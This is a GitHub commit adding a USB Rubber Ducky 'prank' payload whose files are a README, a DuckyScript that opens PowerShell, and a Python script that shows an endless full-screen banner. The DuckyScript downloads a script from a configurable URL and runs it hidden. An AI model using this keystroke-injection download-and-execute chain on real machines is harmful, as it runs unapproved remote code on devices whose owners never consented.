Merge pull request #312 from aleff-github/patch-41

Full-Screen Banner Joke
pull/361/merge
Darren Kitchen 2023-06-09 19:22:55 -05:00 committed by GitHub
commit 294786e0be
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 97 additions and 0 deletions

View File

@ -0,0 +1,27 @@
# Full-Screen Banner Joke
A script used to prank your friends with full-screen banner.
**Category**: Prank
## Description
A script used to prank your friends with full-screen banner.
Open a PowerShell, download the Python script and execute it. The Python script will create a black full screen with a triggered prank phrase.
## Getting Started
### Dependencies
* Internet Connection
* Python installed
* ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings
- Setup your Python script link in the payload.txt file

View File

@ -0,0 +1,38 @@
REM ############################################
REM # |
REM # Title : Full-Screen Banner Joke |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ############################################
REM Requirements:
REM - Internet Connection
REM - Python installed
REM - ExecutionPolicy Bypass
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4

View File

@ -0,0 +1,32 @@
try:
import pygame
except:
import os
os.system("pip install pygame")
import pygame
import random
pygame.init()
infoObject = pygame.display.Info()
screen_width = infoObject.current_w
screen_height = infoObject.current_h
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("Python Prank!")
font = pygame.font.SysFont("Arial", 64)
while True:
text_color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
text = font.render(":-) RUBBER DUCKS WILL TAKE OVER THE OCEANS! (-: )", True, text_color)
x_offset = random.randint(-50, 50)
y_offset = random.randint(-50, 50)
text_rect = text.get_rect()
text_rect.center = (screen_width//2 + x_offset, screen_height//2 + y_offset)
screen.fill((0, 0, 0))
screen.blit(text, text_rect)
pygame.display.flip()